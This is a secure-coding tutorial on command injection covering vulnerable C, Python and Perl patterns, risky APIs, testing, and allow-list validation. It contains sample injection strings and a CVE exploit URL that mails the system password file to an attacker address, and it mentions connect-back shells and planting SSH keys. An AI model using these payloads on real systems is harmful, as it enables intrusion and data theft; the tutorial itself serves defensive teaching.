Command injection

Entry Notes

Posted: 03232007
Author: Hendra Fang
Category: Software



In 1994, the author of this tutorial was sitting in front of an SGI computer running IRIX that was simply showing the login screen. It gave the option to print some documentation and specify the printer to use. The author imagined what the implementation might be, specified a string that didn’t actually refer to a printer, and suddenly had an administrator window on a box the author not only wasn’t supposed to have access to, but also wasn’t even logged into.

The problem was a command injection attack, in which user input that was meant to be data can be partially interpreted as a command of some sort. Often, that command gives the person who controls the data far more access than was ever intended.

Affected Languages

Command injection problems are a worry anytime commands and data are placed inline together. While languages can get rid of some of the most straightforward command injection attacks by providing good Application Programming Interfaces (APIs) that perform proper input validation, there is always the possibility that new APIs will introduce new kinds of command injection attacks.

The Sin Explained

Command injection problems occur when untrusted data is placed into data that is passed to some sort of compiler or interpreter, where the data might, if it’s formatted in a particular way, be treated as something other than data.

The canonical example for this problem has always been API calls that directly call the system command interpreter without any validation. For example, the old IRIX login screen (mentioned previously) was doing something along the lines of:

char buf[1024];
/* Vulnerable: user_input is pasted into the command line with no validation. */
snprintf(buf, sizeof(buf), "lpr -P %s", user_input);
system(buf);

In this case, the user was unprivileged, since it could be absolutely anyone wandering by a workstation. Yet, simply by typing the text: FRED; xterm&, a terminal would pop up, because the ; would end the original command in the system shell; and the xterm command would create a whole new terminal window ready for commands, with the & telling the system to run the process without blocking the current process. (In the Windows shell, the ampersand metacharacter acts the same as a semicolon on a UNIX box.) And, since the login process had administrative privileges, the terminal it created would also have administrative privileges!
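The effect of that input can be reproduced without running anything. The following is a minimal Python 3 sketch, not the original IRIX code: build_print_command and shell_tokens are hypothetical helper names, and the standard shlex module is used only to show roughly how a POSIX-style shell would split the resulting line.

```python
import shlex

def build_print_command(printer_name):
    # Mirrors the vulnerable pattern: data is pasted straight into the command line.
    return "lpr -P %s" % printer_name

def shell_tokens(command_line):
    # punctuation_chars=True makes shlex report shell operators such as ; and &
    # as separate tokens, which approximates what a POSIX shell would see.
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    return list(lexer)

command = build_print_command("FRED; xterm&")
print(command)                # lpr -P FRED; xterm&
print(shell_tokens(command))  # the ; and the xterm command appear as separate tokens
```

The string handed to the shell contains two commands, even though the program only ever meant to supply a printer name.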

There are plenty of functions across many languages that are susceptible to such attacks, as you’ll see later. But, a command injection attack doesn’t require a function that calls to a system shell. For example, an attacker might be able to leverage a call to a language interpreter. This is pretty popular in high-level languages such as Perl and Python. For example, consider the following Python code:

def call_func(user_input, system_data):
    # Vulnerable (Python 2 exec statement): user_input becomes part of the code.
    exec 'special_function_%s("%s")' % (system_data, user_input)

In the preceding code, the Python % operator acts much like the *printf format specifiers in C: it matches up the values in the parentheses with the %s placeholders in the string. As a result, this code is intended to call a function chosen by the system, passing it the argument from the user. For example, if system_data were sample and user_input were fred, Python would run the code:

special_function_sample("fred")

And, this code would run in the same scope that the exec statement is in.

Attackers who control user_input can execute any Python code they want with that process, simply by adding a quote, followed by a right parenthesis and a semicolon. For example, the attacker could try the string:

fred"); print ("foo

This will cause the function to run the following code:

special_function_sample("fred"); print ("foo")

This will not only do what the programmer intended, but will also print foo. Attackers can literally do anything here, including erase files with the privileges of the program, or even make network connections. If this flexibility gives attackers access to more privileges than they otherwise had, this is a security problem.
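The composition step can be examined safely by building the string without executing it. The sketch below is written for Python 3 and is only an illustration: build_code, HANDLERS, and the body of special_function_sample are hypothetical. It also shows one possible alternative, looking the function up in a table so that the user's text is only ever passed as an argument.

```python
def build_code(system_data, user_input):
    # The same string the vulnerable call_func would hand to exec.
    return 'special_function_%s("%s")' % (system_data, user_input)

def special_function_sample(argument):
    # Hypothetical stand-in for a real handler.
    return "sample handled: %s" % argument

# Table of callable handlers; only these names can ever be invoked.
HANDLERS = {"sample": special_function_sample}

def call_func(user_input, system_data):
    handler = HANDLERS.get(system_data)
    if handler is None:
        raise ValueError("unknown handler")
    # user_input stays data: it is an argument, never part of any code string.
    return handler(user_input)

attack = 'fred"); print ("foo'
print(build_code("sample", attack))  # special_function_sample("fred"); print ("foo")
print(call_func(attack, "sample"))
```

With the lookup table, the hostile string reaches the handler unchanged, as a plain string.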

Many of these problems occur when control constructs and data are juxtaposed, and attackers can use a special character to change the context back to control constructs. In the case of command shells, there are numerous magical characters that can do this. For example, on most UNIX-like machines, if the attackers were to add a semicolon (which ends a statement), backtick (data between backticks gets executed as code), or a vertical bar (everything after the bar is treated as another, related process), they could run arbitrary commands. There are other special characters that can change the context from data to control; these are just the most obvious.

One common technique for mitigating problems with running commands is to use an API to call the command directly, without going through a shell. For example, on a UNIX box, there’s the execv() family of functions, which skips the shell and calls the program directly, giving the arguments as strings.

This is a good thing, but it doesn’t always solve the problem, particularly because the spawned program itself might put data right next to important control constructs. For example, calling execv() on a Python program that then passes the argument list to an exec would be bad. We have even seen cases where people execv()’d /bin/sh (the command shell), which totally misses the point.
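In Python 3, the closest everyday equivalent of calling execv() directly is to give subprocess.run an argument list and leave the shell out of it. The sketch below assumes Python 3.7 or later; echo_argument is a hypothetical helper, and the child program is simply the current Python interpreter printing its first argument back.

```python
import subprocess
import sys

def echo_argument(value):
    # The child is started directly from an argument list; no shell is involved,
    # so characters such as ; and & reach the child as ordinary data.
    child = [sys.executable, "-c",
             "import sys; sys.stdout.write(sys.argv[1])", value]
    result = subprocess.run(child, capture_output=True, text=True, check=True)
    return result.stdout

print(echo_argument("FRED; xterm&"))  # FRED; xterm&
```

As the text notes, this only helps if the spawned program does not itself feed the argument to another interpreter.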

Related Sins

A few of the sins can be viewed as specific kinds of command injection problems. SQL injection is clearly a specific kind of command injection attack. Format string problems can be seen as a kind of command injection problem, too. This is because the attacker takes a value that the programmer expected to be data, and then inserts read and write commands (for example, the %n specifier is a write command). Those particular cases are so common that we’ve treated them separately.

This is also the core problem in cross-site scripting, where attackers can choose data that looks like particular web control elements if that data is not properly validated.

Spotting the Sin Pattern

Here are the elements to the pattern:

  • Commands (or control information) and data are placed inline next to each other.

  • There is some possibility that the data might get treated as a command, often due to characters with special meanings, such as quotes and semicolons.

  • Control over commands would give users more privileges than they already have.

Spotting the Sin During Code Review

There are numerous API calls and language constructs across a wide variety of different programming languages that are susceptible to this problem. A good approach to reviewing code for this problem is to first identify every construct that could possibly be used to invoke any kind of command processor (including command shells, a database, or the programming language interpreter itself). Then, look through the program to see if any of those constructs are actually used. If they are, then check to see whether a suitable defensive measure is taken. While defensive measures can vary based on the sin, one should usually be skeptical of deny-list-based approaches, and favor allow-list approaches (see the “Redemption Steps” section that follows).
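The first review step, finding every use of a risky construct, is easy to automate roughly. The following Python 3 sketch is a starting point only, not a complete auditing tool: RISKY_CONSTRUCTS is a hypothetical list drawn from the Python constructs discussed in this article, and the search looks only for call-style uses in source text.

```python
import re

# Hypothetical watch list; extend it for the languages and APIs you review.
RISKY_CONSTRUCTS = ("os.system", "os.popen", "execfile", "exec",
                    "eval", "compile", "input")

# Match a listed name that is not part of a longer identifier or attribute,
# followed by an opening parenthesis.
_RISKY_PATTERN = re.compile(
    r"(?<![\w.])("
    + "|".join(re.escape(name) for name in RISKY_CONSTRUCTS)
    + r")\s*\("
)

def find_risky_calls(source):
    """Return (line_number, construct) pairs for every suspicious call."""
    findings = []
    for line_number, line in enumerate(source.splitlines(), start=1):
        for match in _RISKY_PATTERN.finditer(line):
            findings.append((line_number, match.group(1)))
    return findings

sample = (
    "import os\n"
    "os.system('lpr -P ' + printer)\n"
    "value = eval(text)\n"
    "print('evaluate this')\n"
)
print(find_risky_calls(sample))  # [(2, 'os.system'), (3, 'eval')]
```

Each hit still needs a human to decide whether untrusted data can reach the call and whether a suitable check is in place.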

Here are some of the more popular constructs to be worried about:

Language | Construct | Comments
C/C++ | system(), popen(), execlp(), execvp() | POSIX
C/C++ | The ShellExecute() family of functions; _wsystem() | Win32 only
Perl | system | If called as one argument, can call the shell if the string has shell metacharacters.
Perl | exec | Similar to system, except ends the Perl process.
Perl | backticks (`) | Will generally invoke a shell.
Perl | open | If the first or last character of the filename is a vertical bar, then Perl opens a pipe instead. This is done by calling out to the shell, and the rest of the filename becomes data passed through the shell.
Perl | Vertical bar operator | This acts just like the POSIX popen() call.
Perl | eval | Evaluates the string argument as Perl code.
Perl | Regular expression /e operator | Evaluates a pattern-matched portion of a string as Perl code.
Python | exec, eval | Data gets evaluated as code.
Python | os.system, os.popen | These delegate to the underlying POSIX calls.
Python | execfile | This is similar to exec and eval, but takes the data to run from the specified file. If the attacker can influence the contents of the file, the same problem occurs.
Python | input | Equivalent to eval(raw_input()), so this actually executes the user’s text as code!
Python | compile | The intent of compiling text into code is ostensibly that it’s going to get run!
Java | Class.forName(String name), Class.newInstance() | Java byte code can be dynamically loaded and run. In some cases, the code will be sandboxed when coming from an untrusted user (particularly when writing an applet).
Java | Runtime.exec() | Java attempted to do the secure thing by not giving any direct facility to call a shell. But shells can be so convenient for some tasks that many people will call this with an argument that explicitly invokes a shell.

Testing Techniques to Find the Sin

Generally, the thing to do is to take every input, think of what kind of command shell it could possibly get passed off to, then try sticking in each metacharacter for that shell, and see if it blows up. Of course, you want to choose inputs in a way that, if the metacharacter works, something measurable will actually happen.

For example, if you want to test to see if data is passed to a UNIX shell, add a semicolon, and then try to mail yourself something. But, if the data is placed inside a quoted string, you might have to insert an end quote to get out. To cover this, you might have a test case that inserts a quote followed by a semicolon, then a command that mails yourself something. Check if it crashes or does other bad things, as well as if you get e-mail; your test case might not perform the exact attack sequence, but it might be close enough that it can still reveal the problem. While there are a lot of possible defenses, in practice, you probably won’t need to get too fancy. You usually can create a simple program that creates a number of permutations of various metacharacters (control characters that have special meanings, such as ;) and commands, send those to various inputs, and see if something untoward results.
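A simple generator for such test inputs might look like the Python 3 sketch below. The metacharacter and quote lists are deliberately short, and generate_payloads, the base value, and the marker command are hypothetical; a real test would use a command with a measurable effect, such as mailing yourself.

```python
import itertools

# A few of the most obvious UNIX shell metacharacters.
METACHARACTERS = [";", "|", "&", "`"]
# Try each one bare, and after a closing double or single quote.
QUOTE_PREFIXES = ["", '"', "'"]

def generate_payloads(base, command):
    """Combine a harmless base value with each quote/metacharacter pairing."""
    payloads = []
    for quote, meta in itertools.product(QUOTE_PREFIXES, METACHARACTERS):
        if meta == "`":
            # Backticks wrap the command instead of preceding it.
            payloads.append("%s%s`%s`" % (base, quote, command))
        else:
            payloads.append("%s%s%s %s" % (base, quote, meta, command))
    return payloads

for payload in generate_payloads("FRED", "touch /tmp/injection_marker"):
    print(payload)
```

Each generated string is then submitted to every input under test, and the tester checks afterward whether the marker command ran.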

Tools from companies such as SPI Dynamics and Watchfire automate this kind of testing for web-based applications.

Example Sins

The following entries on the Common Vulnerabilities and Exposures (CVE) web site (http://cve.mitre.org) are examples of command injection attacks.

CAN-2001-1187

The CSVForm Perl Common Gateway Interface (CGI) script adds records to a comma-separated value (CSV) database file. OmniHTTPd 2.07 web server ships with a script called statsconfig.pl. After the query is parsed, the filename (passed in the file parameter) gets passed to the following code:

sub modify_CSV { if(open(CSV,$_[0])){ … }

There’s no input validation done on the filename, either. So you can use the cruel trick of adding a pipe to the end of the filename.

An example exploit would consist of visiting the following URL:

http://www.example.com/cgi-bin/csvform.pl?file=mail%20attacker@attacker.org</etc/passwd|

On a UNIX system, this will e-mail the system password file to an attacker.

Note that the %20 is a URL-encoded space. The decoding gets done before the CGI script gets passed its data.
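The decoding step, and the reason the decoded value is dangerous, can be sketched in Python 3 with the standard urllib.parse module. The helper opens_pipe is hypothetical; it only mirrors the rule described earlier for Perl's open, where a vertical bar as the first or last character of the filename requests a pipe.

```python
from urllib.parse import unquote

def opens_pipe(filename):
    # Mirrors the rule for Perl's open: a leading or trailing vertical bar
    # (ignoring surrounding whitespace) means "run this as a command".
    stripped = filename.strip()
    return stripped.startswith("|") or stripped.endswith("|")

raw_value = "mail%20attacker@attacker.org</etc/passwd|"
decoded = unquote(raw_value)

print(decoded)              # mail attacker@attacker.org</etc/passwd|
print(opens_pipe(decoded))  # True
```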

The example exploit we give isn’t all that interesting these days, because the UNIX password file only gives usernames. Attackers will probably decide to do something instead that will allow them to log in, such as write a public key to ~/.ssh/authorized_keys. Or, attackers can actually use this to both upload and run any program they want by writing bytes to a file. Since Perl is obviously already installed on any box running this, an obvious thing to do would be to write a simple Perl script to connect back to the attacker, and on connection, give the attacker a command shell.

CAN-2002-0652

The IRIX file system mounting service allows for remote file system mounting over RPC calls, and is generally installed by default. It turns out that, up until the bug was found in 2002, many of the file checks that the server needed to make when receiving a remote request were implemented by using popen() to run commands from the command line. The information used in that call was taken directly from the remote user, and a well-placed semicolon in the RPC parameter would allow the attacker to run shell commands as root on the box.

Redemption Steps

The obvious thing to do is to never invoke a command interpreter of any sort. But, that isn’t always practical, especially when using a database. Similarly, it would be just about as useful to say that if you do have to use a command shell, don’t use any external data in it. That just isn’t practical advice in most cases.

The only worthwhile answer is to do validation. The road to redemption is quite straightforward here:

  1. Check the data to make sure it is okay.

  2. Take an appropriate action when the data is invalid.

Data Validation

At the highest level, you have two choices. You can either validate everything you’re going to ship off to the external process, or you can just validate the parts that are input from untrusted sources. Either one is fine, as long as you’re thorough about it.

It’s usually a good idea to validate external data right before you use it. There are a couple of reasons for this. First, it ensures that the data gets examined on every data path leading up to that use. Second, the semantics of the data are often best understood right before using the data. This allows you to be as accurate as possible with your input validation checks. It also is a good defense against the possibility of the data being modified in a bad way after the check.

Ultimately, however, a defense-in-depth strategy is best here. It’s also good to check data as it comes in so that there is no risk of it being used without being checked elsewhere. Particularly if there are lots of places where the data can be abused, it might be easy to overlook a check in some places.

There are three prominent ways to determine data validity:

  • The deny-list approach You look for matches demonstrating that the data is invalid, and accept everything else as valid.

  • The allow-list approach You look for the set of valid data, and reject anything else (even if there’s some chance it wasn’t problematic).

  • The “quoting” approach You transform data so that there cannot be anything unsafe.

All of these approaches have the drawback that you might forget something important. In the case of deny-lists and quoting, this could obviously have bad security implications. In fact, it’s unlikely that you’ll end up with secure software using a deny-list approach if you’re passing the data to some kinds of systems (such as shells), because the list of characters that can have special meaning is actually quite lengthy. For some systems, just about anything other than letters and digits can have a special meaning. Quoting is also much more difficult than one might think. For example, when one is writing code that performs quoting for some kinds of command processors, it’s common to take a string, and stick it in quotes. If you’re not careful, attackers can just throw their own quotes in there. And, with some command processors, there are even metacharacters that have meaning inside a quoted string (this includes UNIX command shells).
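The difference between naive and careful quoting can be seen in a few lines of Python 3. This is a sketch under stated assumptions: naive_quote is a hypothetical helper, shlex.quote targets POSIX shells only, and shlex.split is used here as a rough stand-in for how such a shell would divide the text into words.

```python
import shlex

def naive_quote(value):
    # Just sticks the value in double quotes, as described above.
    return '"%s"' % value

hostile = 'x"; xterm & echo "'

# The attacker's own quote closes the string early, so the "quoted" value
# falls apart into several words, including a second command.
naive_words = shlex.split(naive_quote(hostile))

# shlex.quote escapes the value so that it survives as exactly one word.
careful_words = shlex.split(shlex.quote(hostile))

print(naive_words)
print(careful_words == [hostile])  # True
```

Even the careful version covers only one family of shells, which is part of why quoting is a weaker defense than an allow-list.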

To give you a sense of how difficult it can be, try to write down every UNIX shell metacharacter on your own. Include everything that may be taken as control, instead of data. How big is your list?

Our list includes every piece of punctuation except @, _, +, :, and the comma. And we’re not sure that those characters are universally safe. There might be shells where they’re not.

You may think you have some other characters that can never be interpreted with special meaning. A minus sign? That might be interpreted as signaling the start of a command-line option if it’s at the start of a word. How about the caret (^)? Did you know it does substitution? How about the % sign? While it might often be harmless when interpreted as a metacharacter, it is a metacharacter in some circumstances, because it does job control. The tilde (~) is similar in that it will, in some scenarios, expand to the home directory of a user if it’s at the start of a word, but otherwise it will not be considered a metacharacter. That could be an information leakage or worse, particularly if it is a vector for seeing a part of the file system that the program shouldn’t be able to see. For example, you might stick your program in /home/blah/application, and then disallow double dots in the string. But the user might be able to access anything in /home/blah just by prefixing with ~blah.

Even spaces can be control characters, because they are used to semantically separate between arguments or commands. There are many types of spaces with this behavior, including tabs, new lines, carriage returns, form feeds, and vertical tabs.

Plus, there can be control characters like CTRL-D and the NULL character that can have undesirable effects.

All in all, it’s much easier to use an allow-list. If you’re going to use a deny-list, you’d better be incredibly sure you’re covering all your bases. But, allow-lists alone may not be enough. Education is definitely necessary, because even if you’re using an allow-list, you might allow spaces or tildes without realizing what might happen in your program from a security perspective.

Another issue with allow-lists is that you might have unhappy users because inputs that should be allowed aren’t. For example, you might not allow a “+” in an e-mail address, but find people who like to use them to differentiate who they’re giving their e-mail address to. Still, the allow-list approach is strongly preferable to the other two approaches.

Consider the case where you take a value from the user that you’ll treat as a filename. Let’s say you do validation as such (this example is in Python):

import string

for char in filename:
    if char not in string.ascii_letters and char not in string.digits and char != '.':
        raise ValueError("InputValidationError")

This allows periods so that the user can type in files with extensions, but forgets about the underscore, which is common. But, with a deny-list approach, you might not have thought to disallow the slash, which would be bad; an attacker could use it plus the dots to access files elsewhere on the filesystem, beyond the current directory. With a quoting approach, you would have had to write a much more complex parsing routine.
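A slightly fuller allow-list check, written by hand for Python 3, might look like the following sketch. The names validate_filename, ALLOWED_FILENAME_CHARS, and InputValidationError are hypothetical, and the extra rule about leading dots is an assumption added here so that "." and ".." cannot slip through as filenames.

```python
import string

# Letters, digits, the period, and the underscore the earlier check forgot.
ALLOWED_FILENAME_CHARS = frozenset(string.ascii_letters + string.digits + "._")

class InputValidationError(ValueError):
    """Raised when a value fails the allow-list check."""

def validate_filename(filename):
    if not filename:
        raise InputValidationError("empty filename")
    if filename.startswith("."):
        # Assumption: reject ".", "..", and hidden files outright.
        raise InputValidationError("invalid character")
    for char in filename:
        if char not in ALLOWED_FILENAME_CHARS:
            raise InputValidationError("invalid character")
    return filename

print(validate_filename("annual_report.txt"))  # annual_report.txt
```

Because the slash is simply not on the list, a value such as ../etc/passwd is rejected without anyone having to think of it in advance.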

It’s common to use regular expressions to perform this kind of test. Regular expressions are easy to get wrong, however, especially when they become complex. If you want to handle nested constructs and such, forget about it.

Generally, from a security view, it’s better to be safe than sorry. Using regular expressions can lead to easy rather than safe practices, particularly when the most precise checks would require more complex semantic checking than a simple pattern match.

When a Check Fails

There are three general strategies to dealing with a failure. They’re not even mutually exclusive. It’s good to always do at least the first two:

  • Signal an error (of course, refuse to run the command as-is). Be careful how you report the error, however. If you just copy the bad data back, that could become the basis for a cross-site scripting attack. You also don’t want to give the attacker too much information (particularly if the check uses run-time configuration data), so sometimes it’s best to simply say “invalid character” or some other vague response.

  • Log the error, including all relevant data. Be careful that the logging process doesn’t itself become a point of attack; some logging systems accept formatting characters, and trying to naively log some data (such as carriage returns and linefeeds) could end up corrupting the log.

  • Modify the data to be valid, either replacing it with default values or transforming it.

We don’t generally recommend the third option. Not only can you make a mistake in the transformation, but even when you get it right, a user who made a mistake ends up running something other than what they typed, and the resulting behavior can be unexpected. It’s easier to simply fail, and do so safely.
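The first two strategies can be combined in a small helper. The Python 3 sketch below uses the standard logging module; reject, the logger name, and InputValidationError are hypothetical names. The bad value is logged through repr(), which escapes carriage returns and linefeeds, and the caller only ever sees a vague message.

```python
import logging

logger = logging.getLogger("input_validation")

class InputValidationError(ValueError):
    """Raised when untrusted input fails validation."""

def reject(field_name, bad_value):
    # %r logs repr(bad_value): newlines and other control characters are
    # escaped, so the value cannot forge extra log lines. The value is passed
    # as an argument, never used as the format string itself.
    logger.warning("rejected input for %s: %r", field_name, bad_value)
    # The error shown to the user does not echo the bad data back.
    raise InputValidationError("invalid character")

try:
    reject("printer", "FRED; xterm&\nforged log line")
except InputValidationError as error:
    print(error)  # invalid character
```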

Extra Defensive Measures

If you happen to be using Perl, the language has facilities to help you detect this kind of error at run time. It’s called taint mode. The basic idea is that Perl won’t let you send unsanitized data to one of the bad functions above. But, the checks only work in taint mode, so you get no benefit if you don’t run it. Plus, you can accidentally un-taint data without really having validated anything. There are other minor limitations, too, so it’s good not to rely solely upon this mechanism. Nonetheless, it’s still a great testing tool, and usually worth turning on as one of your defenses.

For the common API calls that invoke command processors, you might want to write your own wrapper API to them that does allow-list filtering, and throws an exception if the input is bad. This shouldn’t be the only input validation you do because, often, it’s better to perform more detailed sanity checks on data values. But, it’s a good first line of defense, and it’s easy to enforce. You can either make the wrappers replace the “bad” functions, or you can use a simple search tool in code auditing to find all the instances you missed and quickly make the right replacement.
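Such a wrapper could be sketched in Python 3 as follows. Everything here is an assumption for illustration: checked_run, ALLOWED_ARGUMENT_CHARS, and UnsafeArgumentError are hypothetical names, the allow-list is intentionally strict, and the example child program is just the current Python interpreter echoing its argument.

```python
import string
import subprocess
import sys

# Strict allow-list for user-supplied arguments.
ALLOWED_ARGUMENT_CHARS = frozenset(string.ascii_letters + string.digits + "._")

class UnsafeArgumentError(ValueError):
    """Raised when a user-supplied argument fails the allow-list check."""

def checked_run(trusted_argv, user_args):
    """Run trusted_argv plus validated user_args, without invoking a shell."""
    for arg in user_args:
        if not arg or arg.startswith(".") or not set(arg) <= ALLOWED_ARGUMENT_CHARS:
            raise UnsafeArgumentError("invalid character")
    return subprocess.run(list(trusted_argv) + list(user_args),
                          capture_output=True, text=True, check=False)

# The trusted part of the command comes from the program, not from the user.
echo = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])"]
print(checked_run(echo, ["report.txt"]).stdout)  # report.txt
```

Routing every call through one function like this also gives code auditors a single name to search for, and a single place to tighten the check later.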

Conclusions

  • Do perform input validation on all input before passing it to a command processor.

  • Do handle the failure securely if an input validation check fails.

  • Do not pass unvalidated input to any command processor, even if the intent is that the input will just be data.

  • Do not use the deny-list approach, unless you are 100 percent sure you are accounting for all possibilities.

  • Consider avoiding regular expressions for input validation; instead, write simple and clear validators by hand.
